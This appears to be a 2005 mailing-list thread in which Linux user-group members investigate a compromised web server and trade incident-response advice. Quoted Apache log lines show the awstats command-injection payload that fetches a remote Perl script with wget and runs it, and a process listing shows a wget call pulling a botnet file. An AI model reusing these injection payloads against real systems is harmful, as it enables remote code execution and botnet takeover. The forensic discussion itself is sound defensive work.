on Tue, Feb 15, 2005 at 02:35:49PM -0800, Rod Roark ([EMAIL PROTECTED]) wrote:
I think I found the point of entry. From the lugod.org
apache log:
65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] POST
On Wed, Feb 16, 2005 at 04:21:45AM -0800, Karsten M. Self wrote:
awstats was a PoE for a system I have occasional use of. You might want
to Google for / ask about Rick Moen's discovery of global variables in
PHP. Discussion on the BAD (Bay Area Debian) list.
They've been disabled, and I've
I found that something was sucking up all my bandwidth late
this morning. ps -aux showed this:
apache3267 0.0 0.0 2560 1024 ?S11:14 0:00 sh -c wget
leblocks.sytes.net/botnet | grep abcdeee 21 31
apache3268 0.0 0.1 3060 1460 ?S11:14 0:00 wget
Most common trojan/exploit is for irc relays.
Guess for entry? Did you upgrade php and apache after those security holes
were found a while back?
could you send me a copy of the binary files you have found in
/tmp/.image? (Thanks.)
-ME
Rod Roark said:
I found that something was sucking up all
2 tools:
1) Rootkit with local exploits
2) IRC Relay with authentication and bounce... probably a file server for
dcc requests of pr0n, movies, or music.
You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have
Also, you will want to look at processes that are still running. Check out
inetd. Use your fu from /proc/PID/*exe* and dump to files and service
daemons. do a cmp of the dumped data with the actual executable on disk.
If the item in memory != app on disk, that is a sign that the service you
see
I'm going on the assumption currently that they broke in via
apache and did not get root... nothing suggests otherwise
so far.
I've killed all apache processes and am checking all files
and directories writable by apache.
Thanks,
-- Rod
On Tuesday 15 February 2005 01:14 pm, ME wrote:
Also,
I think I found the point of entry. From the lugod.org
apache log:
65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] POST
/awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
ho%20;echo| HTTP/1.0 200 525 - Mozilla/4.0 (compatible; MSIE 6.0b;
In particular:
http://www.idefense.com/application/poi/display?id=185type=vulnerabilities
which includes this gem:
An attacker can cause arbitrary commands to be
executed by prefixing them with the | character.
-- Rod
On Tuesday 15 February 2005 02:35 pm, Rod Roark wrote:
I think I found
Quoting Rod Roark ([EMAIL PROTECTED]):
I think I found the point of entry. From the lugod.org
apache log:
65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] POST
/awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
ho%20;echo| HTTP/1.0 200
Quoting ME ([EMAIL PROTECTED]):
You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have
installed.
Rod is certainly qualified to choose his own poison, but this is what I
did:
o Bring down system. Secure best
Rick Moen said:
Quoting ME ([EMAIL PROTECTED]):
You will want to down the box and run some integrity checking scripts to
verify the applications installed are from the packages you have
installed.
Rod is certainly qualified to choose his own poison, but this is what I
did:
[chop]
I would
12 matches
Mail list logo
